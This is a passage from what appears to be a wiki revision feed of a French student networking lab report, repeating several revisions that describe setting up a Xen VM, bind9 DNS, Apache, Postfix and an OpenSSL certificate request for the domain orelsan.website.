&amp;lt;b&amp;gt;Installation boite mail&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Générer une demande de certificat en SHA 2&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35635</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35635"/>
				<updated>2016-12-05T16:41:56Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Installation boite mail&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Générer une demande de certificat en SHA 2&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
monserveur.key contient la clé privée.&lt;br /&gt;
serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat&lt;br /&gt;
&lt;br /&gt;
on crée 2 fichier avec :&lt;br /&gt;
inter.crt qui contient le certificat intermédiaire&lt;br /&gt;
gandi.crt qui qui contient le certificat &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35634</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35634"/>
				<updated>2016-12-05T16:34:55Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Installation boite mail&amp;lt;/b&amp;gt;&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35633</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35633"/>
				<updated>2016-12-05T16:26:47Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
